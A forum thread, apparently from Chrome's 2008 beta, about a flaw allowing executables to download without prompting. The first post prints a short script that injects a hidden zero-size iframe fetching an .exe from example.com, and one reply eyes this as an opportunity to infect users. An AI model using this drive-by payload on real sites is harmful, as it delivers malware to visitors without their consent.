The evil blackhatters laughs by Google Chrome

Emalker

Registered Member
Joined
Nov 15, 2007
Messages
61
Reaction score
26
Googles new browser "Chrome" allows files (executables) to be automatically downloaded to the user's computer without any user prompt.

Code:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>
 
pretty positive they'll have that fixed by the time they go out of beta...
 
For sure it will be fixed shortly.
Else it's gonna be the end of Google. It will become all to easy for hackers to remotely put some trojans or other shit on computers using it.
 
I have been seeing a lot of people use Google Chrome on other forum's. this could be a huge opportunity for a short while.
 
Bad security hole, but it is hard to exploit. You would still have to get the user to click on it after it's been downloaded.

EDIT: Combined with the carpet bombing security hole, this is REALLY REALLY BAD. The user wouldn't have to click anything in order to run the executable.
 
Last edited by a moderator:
I really don't understand why so many people are jumping on the chrome bandwagon, sure it's from google and in time it may well become the browser of choice but in it's current early beta form it looks and feels rather clunky and is less secure than an open front door.
 
Maybe because it's being whored on one of the most popular destinations on the entire internet...Google's front page. I don't like the whole thing one bit.

I really don't understand why so many people are jumping on the chrome bandwagon, sure it's from google and in time it may well become the browser of choice but in it's current early beta form it looks and feels rather clunky and is less secure than an open front door.
 
Back
Top